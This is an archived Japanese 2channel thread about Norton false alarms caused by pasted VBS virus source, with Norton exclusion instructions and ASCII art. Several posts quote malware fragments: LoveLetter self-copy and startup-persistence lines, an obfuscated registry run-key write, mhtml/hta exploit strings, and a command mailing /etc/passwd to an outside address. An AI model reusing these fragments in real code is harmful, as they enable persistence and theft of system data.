ノートンがvbsウィルスのソースに誤反応3
■ このスレッドは過去ログ倉庫に格納されています
只今2chでvbsのウィルスのソースを貼りノートンなどのセキュリティツールを誤反応させるのが流行っています。
あまりにも質問スレなどで既出の(このvbsの)質問が多すぎるのでこのスレへURLを貼って誘導してください。
また新たなパターンのvbsが見つかったら一応このスレで報告願えると幸いです。
■この問題について■
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
ご存知の通り、htmlを読んでもこのvbsのソースは実行されることは無いので、全く問題ありません。
また、デフォルトだとIEはInternet Temporary Filesフォルダにhtmlをダウンロードしますので、感染ファイルはここのhtmlファイルにになります。
これらのファイルは削除しても全く問題ありませんが、該当スレを読み直すとまたvbsのソース付きhtmlがダウンロードされてしまうので警告が出ます。
■まとめと対策■
2ちゃんねる見ていたらvbsウィルスが検出された!
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq12
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
前スレ
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応2
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/
テンプレ>>1-10あたり ■既知のvbsウィルスのソース■
・VBS.Internal
出元はhttp://tmp.2ch.net/test/read.cgi/download/1025717301/197だと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?
一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
http://www.symantec.com/region/jp/sarcj/data/v/vbs.internal.html
Q.ウイルスコードが貼られているのにノートン反応しない。。。
A.ウイルスコードが貼られている2ちゃんねるのスレをテストページとして使用するのは奨励されない。
なぜなら、ここで言われているノートンの反応は単なる掲示板とスキャンエンジンの「仕様の衝突」であり、
これからも同じページを見ればその都度反応するという保証がないから。
仕様というものは、ある時突然変更されたりするもの。
ネットサーフィン中のウイルス対策ソフトの常駐動作確認は、テスト用に作られたEICARテストファイルにアクセスして行うべき。
EICARテストファイル(正常に常駐していればURLにアクセスと同時に反応します)
ttp://www.eicar.org/download/eicar.com.txt / ̄|
| |
| | / ̄ ̄ ̄ ̄ ̄ ̄
,― \ |
| ___) | ∩∩ ∠ リュンパッチ♪
| ___) | | |_| | \______
| ___) |\___(・∀・ )_____
ヽ__)_/ \___ _____, )__
〃 . / / / / 〃⌒i
| / ./ / / .i::::::::::i
____| /⌒\./ / / | ____|;;;;;;;;;;;i
[__]___| / /-、 .\_. / Uし'[_] .|
| || | / /i i / | || |
| ||____|____/ / .| .|\_ノ______..| || |
|(_____ノ /_| |_________..| || |
| LLLLLL./ __)L_| |LLLLLLLLLLLLLLLLL. | ||_____」
| || (_/ / i .| || | ||
|_|| / .ノ |_|| |_||
(_/ Q.2ちゃんねるの板開いただけで反応します。
A.スレッドタイトルにウイルスコードが貼られていることがあり、それに反応しています。
2ちゃんねるブラウザの場合、ログ保存フォルダの他にスレタイ・既読スレ履歴等を保存しているファイルやフォルダを除外。
各2ちゃんねるブラウザによってスレタイ・既読スレ履歴等を保存しているファイルやフォルダが異なるようなので
特定のドライブ、フォルダ、ファイルをウイルススキャンの対象から除外する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/7c3ff4677729271685256c470046ed2e/d9265b84ded9587488256b0400811ff7
↑を参考にお使いの2ちゃんねるブラウザのスレでお聞きください。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08 ◆◇◆ 報告用テンプレ ◆◇◆ (暫定)
■>>1-9を読みましたか? 『YES/NO』
■2ちゃんねるの板・スレ・レス番のアドレス 『 』
■ノートンのメッセージ(ウイルス名) 『 』
■ブラウザの種類 『 』
■ノートンのヴァージョン 『 』
■ノートン以外のアンチウイルスソフト名 『 』
■その他. 『 』 2ちゃんねるに貼られたウイルスコードに誤反応していたことがわかったら
インターネットエクスプローラの場合
ツール→インターネットオプション→インターネット一時ファイル、ファイルの削除
これをしないでウイルススキャンしたらインターネット一時ファイル(Temporary Internet Filesフォルダ)でウイルス反応がでます。
また、該当レスを再び読み込むとウイルス反応がでます。
2ちゃんねるブラウザを使って以下の設定をして2ちゃんねるを見ましょう。
2ちゃんねるブラウザの場合
2ちゃんねる専用ブラウザでノートンを使うと今まで取得したログが抹消されてしまい、スレを再表示した時全てが新しいレスになってしまいます、どうすれば解決できるでしょうか?
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8#faq08
2chブラウザのログ保存フォルダを「除外」に設定。
NAV2003以降はNorton Anti Virusのオプションで手動スキャンとAuto-Protectでそれぞれ除外の指定をして下さい。 よろ
kak.hta';ken=wdt'START
ms-its:mhtml:file://c:\
DAT落ち阻止て神戸♪
>>13
VBS.LoveLetter.Var
http://pc5.2ch.net/test/read.cgi/pcqa/1033948204/928
ウイルスコードが貼られているのにノートン反応しないって人は>>2見てね。 ありがとう
しかしラブレター1個だけではないはず。
カーネルやネットワークも入っている。
一つ一つ解説してください。 c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
↑こういうのって最初に気づいた奴って天才だよな あ。そうそう。
>>16 みたいなスクリプトを誤反応しないような、datファイルに
datを作り変えるプログラム作ってみました。
よかったら使ってみてください。
http://www.geocities.jp/cen_hp/index.html >>18
自分のパソコンで何度も実行してますが、大丈夫ですよー。
さっき総質で見た、未対応のスクリプトに対応させました。 >>17,19
ご支援ありがとうございます。
ttp://ansitu.xrea.jp/guidance/?NortonInternetSecurity#faq08tool ==================================
=================/∧ =========/∧
===============/ / λ=======/ / λ ー
=============/ / λ====/ / λ ー /
===========/ / /λ =/ / /λ /
=========/ / / //λ / / //λ __
=======/  ̄ ̄ ̄ \ ___
=====./ / ̄ ) ( ̄ヽ λ /
====/ /●/ \● /λ /
===/ // \ /λ
===| / /| ___|____
==| ∧________ / //| /
==| ヽ───────〆 ///// /|\
===| / / ////| |
===\ / / /////
=====\_ / //////__/. |
========\ ミ/ |
==========\ / ─┐
============\ \ . ─┤
==============\ \ . ─┘
================\ \
==================\ ・ \
=====================
====================== 未だにVIPの板更新すると、ノートン先生の逆鱗に触れてしまうオイラですが
2chのスレにvbsウィルスのソースを書き込むことによってブラウザがそのスレのhtmlファイルをダウンロードする際に
ウィルスのパターンと一致するので、ウィルスが検出されたとノートン先生などが騒ぎます。(設定によっては反応しないこともありますが、全く問題ありません)
らしいです、騒いでごめんなさい。
2chにかぎっては心配(゚听)イラネみたいです。 >>24
スレタイにウィルスコードが書いてある模様。 >>24
漏れもソレダ!!!
もう無視しまくりんぐwwwwwww A Boneを使用してるのですが、PC初心者の上の「初心者の質問」板をクリックするだけで、ノートンがウイルスを検知してしまいます。
しかも板を開く事もできません。毎回そうなってしまいます。
昨日、システムをスキャンしたら確かに感染していました。「初心者の質問」板だけ毎回そうなります。
これは何でしょうか? 2ちゃんを普通に見ていただけなのにノートンから「ウィルス名は
Unix.Penguinで、ファイルを修復できません」と表示されてしまいました。何か対策は無いでしょうか?
ちなみに誤作動との見分け方はありますか? / ̄|
| |
| | / ̄ ̄ ̄ ̄ ̄ ̄
,― \ |
| ___) | ∩∩ ∠ リュンパッチ♪
| ___) | | |_| | \______
| ___) |\___(・∀・ )_____
ヽ__)_/ \___ _____, )__
〃 . / / / / 〃⌒i
| / ./ / / .i::::::::::i
____| /⌒\./ / / | ____|;;;;;;;;;;;i
[__]___| / /-、 .\_. / Uし'[_] .|
| || | / /i i / | || |
| ||____|____/ / .| .|\_ノ______..| || |
|(_____ノ /_| |_________..| || |
| LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」
| || (_/ / i .| || | ||
|_|| / .ノ |_|| |_||
(_/ Open Janeをでスレを見てたらウィルスコードが張られてて
ウィルス警告が出てファイルが修復出来ませんとでました。
ウィルスコードをNGワードに入れたら、NGワードが全部消えて
デスクトップにあるNGWordtxtというアイコンを削除しようとすると
やはりウィルス警告が出て削除できません。
スキャンをするとあるファイルの所まで来ると電源が切れてしまいます。
ウィルス名は「Bloodhound.Exploit6」と出るのですが、どうしたらいいでしょうか・・・。 >>34
∩∩
| |_| | / ̄ ̄ ̄ ̄ ̄ ̄ ̄
/ ̄\ ・∀・) < リュンパッチ♪
.r ┤ ト、 \ \_______
|. \_/ ヽ |
| __( ̄ | | |
| __)_ノ ̄ ̄ ̄ ̄\
ヽ___) ノ \
||\|| ̄ ̄ ̄ ̄ ̄ ̄ ̄|| ̄
|| || ̄ ̄ ̄ ̄ ̄ ̄ ̄||
.|| || すみません。
1つは解決しましたがスキャンすると電源が落ちるのは直りませんので
これは他のスレで聞いてみます なんだ、最近多いと思ってたがウィルスコードのせいだったのか。
しかしこれってあぼーんされないのかな。
とりあえずここみて安心した。ありがと。 Norton Anti Virusと使ってます。
ウイルス、Unix PenguinをNGワードに登録するには
どんな単語をNGワードにすればいいんですか?
Unix Penguinと反応するスレ内見てもそれらしい書き込みがないので分かりません。 >>38
NGワードに登録するんではなく
Norton Anti VirusのオプションのAuto-Protectと手動スキャンでログフォルダを除外に指定しる >>39
いや、それはやってるんですけど、反応するんです。
多分、キャッシュフォルダの方も除外指定にしないとだめっぽいです。
でも、それはセキュリティー的によくないってどっかに書いてあったんで、
NGワードに登録したいんですけど、できないんでしょうか? >>40
2ちゃんねるブラウザのログフォルダを除外にしても2ちゃんねるブラウザで閲覧中に反応するの? >>41
そうです。Norton Anti VirusとLive2chの組み合わせでAnti Virusの設定で
Live2chのログフォルダは除外に設定してます。
でも、Live2chで見てるとUnix Penguinだけ反応します。 これはどうだ?
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\ cat /etc/passwd | mail nobody kak.hta';ken=wd+'START と思ったら、VBS.Network.Eとかいうのも反応しっちゃってるよwww
どういうこと? >>45
、-'''"´ ̄ ̄`"''''-、
/ / ;;;;;;;;;;;;; \ \⌒⌒
/ ..::;;● ;;;;;;;;;;;;;, ●;;;;;;;;;::ヽ ^^
|. .::;;;;;;;;;;;(__人__);;;;;;;;;;;;;;;;::.|
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
:::::;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;::::
:::::::;;;;;;;;;;;;;;;;;;;;;;;;;
::::::::::::::::∧_∧ そうやってなんでも
::::::::: ( ::;;;;;;;;:) VIPのせいにしてりゃいいさ…
_.. /⌒:::;;;;;ヽ
-― ―'ー'-''―-''/ / ::;;;;;;;;:| |―'''ー'-''――'`'
,, '''' . ''''' と./ゝ_;_;_ノヽつ 、、, ''" それがVIPクオリティ…
,,, '' ,,, ::;;;;;;;;;::: ,, ''''' ,,,, http://ex7.2ch.net/news4vip >>43
いや、間違えてないと思います。
なんか他のウイルスにも反応してる。。。Network.E。 >>50
いや、C\ProgramFiles\Live2ch\logになってるからあってると思います。 i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii|
i|ii / ,,__,ニ、、 ノ( | i|i!|i|
|i | Y~~/~y} `, ~ | そ、そんなー… |i
!. | ,k.,.,!,.,.,r| ,! く .!
i / <ニニニ'ノ \ l >>51
除外に設定する時にサブフォルダも含めるにチェック入れた? チン ☆ チン ☆
チン マチクタビレタ〜 チン ♪
♪
♪ ☆チン .☆ ジャーン! マチクタビレタ〜!
☆ チン 〃 ∧_∧ ヽ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
ヽ ___\(・∀・ #) /\_/ < うっかりさん51の報告まだ〜?
チン \_/⊂ つ ‖ \__________
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄/| ‖ マチクタビレタ〜!
|  ̄  ̄ ̄ ̄ ̄ ̄ ̄:| :| /|\
| |/ i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i| / | / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i! /,_ ┴─/ ヽ |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i|| (_゜.,》.'(_゜,》)ミ ヽ ! | |!i||!|ii||!|ii|
i|ii / ,,__,ニ、、 ノ( | i|i!|i|
|i | Y~~/~y} `, ~ | そ、そんなー… |i
!. | ,k.,.,!,.,.,r| ,! く .!
i / <ニニニ'ノ \ l 画像板から誘導されてきました。
「2chブラウザのログ保存フォルダを「除外」に設定」
というのはどうやってやるんでしょうか?
壺を使ってます。
初心者すぎてすいません。どなたかよろしくお願いいたします。 Norton Anti VirusのAuto-Protectと手動スキャンで壺フォルダを除外に指定しても、壺で閲覧中に反応します。
よくわかりません・・・orz
,:::-、 __
,,r::::::::::::〈:::::::::) ィ::::::ヽ
〃::::::::::::;r‐''´:::::::::::::::::::::ヽ::ノ
,'::;'::::::::::::::/::::::::::::::::::::::::::::::::::::
l::::::::::::::::::l::::::::::●::::::::::::::●:::::ji
|::::::::::::::::::、::::::::::::::( _●_)::::::,j:l クマー!
}::::::::::::::::::::ゝ、::::::::::|∪|_ノ::;!
. {::::::::::::::::::::::::::::`='=::ヽノ:::::/
';::::::::::::ト、::::::::::::::i^i::::::::::::/
`ー--' ヽ:::::::::::l l;;;;::::ノ
【ラッキーレス】
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすれば14日後好きな人から告白されるわ宝くじは当たるわ
出世しまくるわ体の悪い所全部治るわでえらい事です
今まで書き込めなかったのはノートン先生の仕業だったのか
このスレのおかげで助かりました 駆除も削除も出来ないんだけどほっといていいのですか? すいません、ノートンAV2005なんですが、Janeのログを除外に設定したいんですが
AV2005のオプションを開いても「除外」っていう項目が無いのですけど
どうすれば設定できるのですか?
ご指導、お願い致します。 大空寺あゆ親衛隊対策
(1)タスクトレイに入っているNorton AntiVirusのアイコンを右クリック
(2)「Norton AntiVirusの設定」をクリック
(3)左側にある「Auto-Protect」をクリック
(4)その下に出てきた「除外」をクリック
(5)「除外する項目」の「新規」をクリック
(6)「C:\Program Files\Live2ch\log」(Live2chの場合)と入力し、「サブフォルダも含める」にチェックを入れ、「OK」をクリック
(7)左側にある「Auto-Protect」をクリック
(8)(4)〜(6)をもう一度繰り返す
(9)設定画面が消えるまで「OK」をクリックする ∧ l'vヘ
ハ ┌( ;/ ト, ,、 rヘ r'^ナrジ-z
__}ヽ,__ (ヽ/ス_r^フしz,り い)n/イr〜^′
'っヾ、r'__ |レ'ノ_C'入彳勺ソメろ_j/し-,_
`フ ヾ勹_| <_r' !|刀_」r''>||/⌒(_rヘ-‐'
<_ゝし||フぅ(ひzメ__ゝ'l !'そ
~zヾ|て 、l レ^ //'| |'~
| | ヽl| // }|
| :! || | | ,/ ,' すいません、ちょっと通りますよ
| :{. || | |/ /
l !|| | | /
ヽ ヽ.|/ //
_,r)_ j (_,( ciz
,ノこ_- __,ーヽ ん|Zゥ レz zjそ_
} ... 丿 ろ、,_!|乙7ムLそ/し-z
ノ""'' 一( `う.l !シ/ア了//_⊂,
/、__ ヽ ^'| |~//,/_ソ ハr^
/ ...... ーl | |// //ノ
/~"' 、__/ ,,,...} |/ ///
{' _ `y′ 一 / r'〜(_ノ
人 =/‐- ハ 丿" ''(
ヽ '' / __,, / / ‐- ''')
'∨ X. }''' ....ノ
j ー/ /== ノ'ヽ
/=‐ r'´-ヽ } ー/'''' {
,' _,, 人 ''"`、 ノ.. '' ノ`ヽ ''"ヽ
{ー / \ -'} / / \'''}`
ハ 〈 )八 ( f )ハ
ヽ ) (( )ノ /
ノ/ ') _/ ちゃんと2ch.netとAuto-Protectと手動スキャンで除外設定しましたが
VBS.Internalがしつこく警告ストロムしてきます
他に必要な手順はありますか? >>72
ひわいな大根買い占める! ハイ!
(( (`Д´) (`Д´) ))
(/ /) (| |)
< ̄< < ̄<
ハイ! ハイ! ハイ
(. `Д)_(Д´ )
ノ ノヽ | |>
ノ > < ヽ
ハイ!
(. )_(`Д´)ノ
ノ ノヽ |ヘ |
ノ > <
ハイ! ワァオ!
(゜∀゜)_(゜∀゜)ノ
ノ ノヽ |ヘ |
ノノ <
あるある探検隊!
_(Д´ ) _(Д´ )
ヘ| |\ ヘ| |\
< <
あるある探検隊!
( `Д)_ ( `Д)_
/| |ヘ /| |ヘ
> > >>71
初心者はテンプレ読んでも何を言っているのかが分からなかったりするので
こういう細かい解説、感謝します。
っていうか大空寺死んで欲しい。(´・ω・`) >>77
透明あぼーんで存在を消し去りましょう。スッキリするよ >>78
透明あぼーんではノートンの反応はおさまらなかったんです。
なにやらメール欄に変なものを書き込んでいるようで。 >>79
>>17のを使うと、メール欄のものでも消し去ります。
>>79
>>71の手順でノートンの誤反応を解消し、専ブラの透明あぼーんで
糞コテやウイルス厨を見えなくするって意味。
分かりにくくてスマソ >>80
>>81
いろいろとありがとうございました。
あいつら(大空寺とかネオとか)どうにかならないもんですかね… XPにはNorton AntiVirusインストールできたのに、98にはできない。
98のウイルススキャン(無償)で感染ファイル35ってでたけど
これをどうすればいいの?
Live2chでUnixPenguinがうざい場合
(1)タスクトレイに入っているNorton AntiVirusのアイコンを右クリック
(2)「Norton AntiVirusの設定」をクリック
(3)左側にある「Auto-Protect」をクリック
(4)その下に出てきた「除外」をクリック
(5)「除外する項目」の「新規」をクリック
(6)「C:\Program Files\Live2ch\log」と入力し、「サブフォルダも含める」にチェックを入れ、「OK」をクリック
(6)「C:\Program Files\Live2ch\temp.htm」も追加する。
(7)左側にある「Auto-Protect」をクリック
(8)(4)〜(6)をもう一度繰り返す
(9)設定画面が消えるまで「OK」をクリックする
あ、そうそう。
>>17のプログラムを更新しましたです。
その他→脅威カテゴリでも「除外」が出てくるけどここは設定しなくていいの?
って、脅威カテゴリで何をしてくれるのかのかよくわからない。(NIS2005)
>>71 >>84
>(7)左側にある「Auto-Protect」をクリック
(7)左側にある「手動スキャン」をクリック ・・・じゃないのかな。 大体、「除外」する項目をAuto-Protectと手動スキャンで
分けている理由がわからない。NIS2002の設定は簡単だった。 ttp://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8 cat /etc/passwd | mail nobody
これが反応するのか? >>89
見事にUnixPenguinと判定してくれた >>84
Live2chでUnixPenguinがうざい場合
IEでうざい場合はどうすればよろしいのでしょうか????? >>93
え???
ダメなんですか???
すみません・・・
初心者なもので・・・
詳しく教えていただけませんか・・・ >>94
ダメじゃないけど、専用ブラウザのほうがずっと便利。
どこまで読んだかわかるし、ログはずっと残せるし、
新着分だけダウンロードするから速いし、軽いし。 >>95
ありがとうございます。
勉強になりました。
今日はウイルスが出てかなりテンパりました(苦笑)
また明日からがんばります!
でしつこいんですが、
IEでうざい場合はどうすればよろしいのでしょうか?
>>96
IEの一時フォルダを除外すれば警告は出なくなるが、
ほかのサイトで感染してしまう。 勇気が無くて見られない画像解説スレ Part702
http://etc3.2ch.net/test/read.cgi/entrance/1116419123/
すいません、↑のスレッドをLive2chで開いただけで
発生源:C:\Documents and Settings\kousuke\Local Settings
\Temporary Internet Files\Content.IE5\MVAP076F\woid[1].jpg
Trojan Horse
とか出るんですけど、誤反応ですか?
vbsのウィルスコードと大空寺のメール蘭攻撃は
除外しているはずなんですが。
ありえないとは思いますがて開いただけで感染したんですか?
Trojan Horse
ウィルス名:
Trojan Horse
別名:
感染場所:
.EXE ファイル >>98
そのファイルはjpgじゃなくて、exeということらしい。
誤反応ではなくて、本物。
スレを開いただけでは感染しないけど、
その画像ファイルをIEで開くと感染する可能性がある。 >>99
おそらく原因のレスは
http://etc3.2ch.net/test/read.cgi/entrance/1116419123/899-
だと思いますが、これ画像そのものはクリックしてないんですが
ただスレッドを開いた瞬間ノートン先生が激しく怒ったス
ログを見ても
アクセスが拒否されました。
修復できませんでした。
としか出てません。
最新のウィルス定義ファイルを落とさないと駆除できないみたいですが、
これは最近のということでしょうか?
そして、今自分のPCにTemporary Internet Filesや
他の場所にウィルスが潜伏してるということはないんでしょうか?それを開くとアウツみたいな。 >>100
そこの899だよ。
でも、ノートンが隔離してるはず。
そうでなくても、IEの一時ファイルをクリアして、ごみ箱を空にするだけでいい。 ■ このスレッドは過去ログ倉庫に格納されています
